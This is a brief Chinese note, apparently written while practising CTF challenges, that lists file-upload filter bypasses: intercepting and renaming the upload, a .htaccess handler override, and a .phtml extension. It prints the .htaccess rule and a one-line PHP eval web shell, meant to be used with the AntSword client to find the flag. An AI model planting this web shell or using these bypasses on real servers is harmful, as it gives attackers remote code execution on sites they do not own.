一.上传shell.jpg(基本没用)
二.上传shell.jpg,抓包之后改shell.php(没有第二次)
三.先上传.htaccess文件绕过,再上传shell.jpg
四.刚学习了一种绕过方法,就是吧shell.jpg的扩展名直接改为.phtml
以上方式成功上传一句话木马之后,链接蚁剑,查看目录找flag即可,
还有例外的上传文件题,flag在配置文件中,需在配置文件中找flag。
附:
.htaccess文件:
<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
(shell.jpg是一句话木马文件)
一句话木马文件shell.php:
<?php @eval($_POST['pass']);?>
(在用yijian链接时密码就是post括号引号里的)